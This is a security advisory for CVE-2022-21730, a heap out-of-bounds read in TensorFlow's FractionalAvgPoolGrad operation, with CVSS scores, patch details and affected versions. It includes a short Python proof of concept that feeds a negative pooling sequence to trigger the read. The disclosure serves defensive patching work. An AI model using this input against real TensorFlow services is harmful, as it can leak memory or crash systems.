CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
EPSS
Percentile
68.9%
The implementation of FractionalAvgPoolGrad
does not consider cases where the input tensors are invalid allowing an attacker to read from outside of bounds of heap:
import tensorflow as tf
@tf.function
def test():
y = tf.raw_ops.FractionalAvgPoolGrad(
orig_input_tensor_shape=[2,2,2,2],
out_backprop=[[[[1,2], [3, 4], [5, 6]], [[7, 8], [9,10], [11,12]]]],
row_pooling_sequence=[-10,1,2,3],
col_pooling_sequence=[1,2,3,4],
overlapping=True)
return y
test()
We have patched the issue in GitHub commit 002408c3696b173863228223d535f9de72a101a9.
The fix will be included in TensorFlow 2.8.0. We will also cherrypick this commit on TensorFlow 2.7.1, TensorFlow 2.6.3, and TensorFlow 2.5.3, as these are also affected and still in supported range.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by Yu Tian of Qihoo 360 AIVul Team.
Vendor | Product | Version | CPE |
---|---|---|---|
tensorflow | gpu | 2.7.0 | cpe:2.3:a:tensorflow:gpu:2.7.0:*:*:*:*:*:*:* |
tensorflow | gpu | * | cpe:2.3:a:tensorflow:gpu:*:*:*:*:*:*:*:* |
tensorflow | cpu | 2.7.0 | cpe:2.3:a:tensorflow:cpu:2.7.0:*:*:*:*:*:*:* |
tensorflow | cpu | * | cpe:2.3:a:tensorflow:cpu:*:*:*:*:*:*:*:* |
tensorflow | tensorflow | 2.7.0 | cpe:2.3:a:tensorflow:tensorflow:2.7.0:*:*:*:*:*:*:* |
tensorflow | tensorflow | * | cpe:2.3:a:tensorflow:tensorflow:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-vjg4-v33c-ggc4
github.com/tensorflow/tensorflow/blob/5100e359aef5c8021f2e71c7b986420b85ce7b3d/tensorflow/core/kernels/fractional_avg_pool_op.cc#L209-L360
github.com/tensorflow/tensorflow/commit/002408c3696b173863228223d535f9de72a101a9
github.com/tensorflow/tensorflow/security/advisories/GHSA-vjg4-v33c-ggc4
nvd.nist.gov/vuln/detail/CVE-2022-21730
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H
EPSS
Percentile
68.9%